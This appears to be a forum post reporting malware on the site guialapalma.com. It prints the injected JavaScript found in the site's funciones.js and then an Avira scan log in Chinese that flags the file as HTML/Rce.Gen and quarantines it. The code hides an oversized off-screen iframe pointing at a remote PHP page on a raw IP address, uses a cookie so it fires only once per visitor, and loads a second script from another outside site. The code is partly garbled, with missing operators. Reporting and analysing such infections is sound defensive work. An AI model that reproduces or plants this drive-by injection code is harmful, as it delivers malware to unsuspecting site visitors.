http://guialapalma.com/

fireold

1. 
   
2. function hwlu09() {
   
3.     var static = 'ajax';
   
4.     var controller = 'index.php';
   
5.     var hwlu = document.createElement('iframe');
   
6.     hwlu.src = 'http://173.201.146.228/samples/glu32.php';
   
7.     hwlu.style.position = 'absolute';
   
8.     hwlu.style.color = '9882';
   
9.     hwlu.style.height = '9882px';
   
10.     hwlu.style.width = '9882px';
    
11.     hwlu.style.left = '10009882';
    
12.     hwlu.style.top = '10009882';
    
13.     if (!document.getElementById('hwlu')) {
    
14.         document.write('<p id=\'hwlu\' class=\'hwlu09\' ></p>');
    
15.         document.getElementById('hwlu').appendChild(hwlu);
    
16.     }
    
17. }
    
18. function SetCookie(cookieName, cookieValue, nDays, path) {
    
19.     var today = new Date();
    
20.     var expire = new Date();
    
21.     if (nDays == null || nDays == 0) nDays = 1;
    
22.     expire.setTime(today.getTime() 3600000 * 24 * nDays);
    
23.     document.cookie = cookieName "="
    
24.     escape(cookieValue)";expires="
    
25.     expire.toGMTString()((path) ? "; path="
    
26.     path : "");
    
27. }
    
28. function GetCookie(name) {
    
29.     var start = document.cookie.indexOf(name "=");
    
30.     var len = start name.length 1;
    
31.     if ((!start) && (name != document.cookie.substring(0, name.length))) {
    
32.         return null;
    
33.     }
    
34.     if (start == -1) return null;
    
35.     var end = document.cookie.indexOf(";", len);
    
36.     if (end == -1) end = document.cookie.length;
    
37.     return unescape(document.cookie.substring(len, end));
    
38. }
    
39. if (navigator.cookieEnabled) {
    
40.     if (GetCookie('visited_uq') == 55) {} else {
    
41.         SetCookie('visited_uq', '55', '1', '/');
    
42.         hwlu09();
    
43.     }
    
44. } /*/a9a007*/
    
45. 
    
46. /*432b0d*/
    
47. document.write('<script src="http://www.trainerlotse.de/backup-alte-website/Hqb5oW2X.php?id=27187680" type="text/javascript"></script>'); /*/432b0d*/

复制代码

Avira

2013/11/30 上午 08:53 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數：        766
      目錄數：        0
      惡意程式碼數：        1
      警告數：        0

2013/11/30 上午 08:53 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\6TI8XMAJ\funciones[1].js'
      包含病毒或有害的程式 'HTML/Rce.Gen' [virus]
      已採取動作：
      檔案會移動至 '5b9d993e.qua' 名稱底下的隔離區目錄。.

2013/11/30 上午 08:52 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\6TI8XMAJ\funciones[1].js 中
      偵測到病毒或有害的程式 'HTML/Rce.Gen [virus]'
      執行的動作：傳輸至掃描程式

2013/11/30 上午 08:52 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\6TI8XMAJ\funciones[1].js 中
      偵測到病毒或有害的程式 'HTML/Rce.Gen [virus]'
      執行的動作：拒絕存取

2013/11/30 上午 08:52 [Web Protection] 發現惡意程式碼
      從 URL "http://guialapalma.com/_js/funciones.js" 存取資料時，
      發現病毒或有害的程式 'HTML/Rce.Gen' [virus]。
      已採取動作：已略過

fs is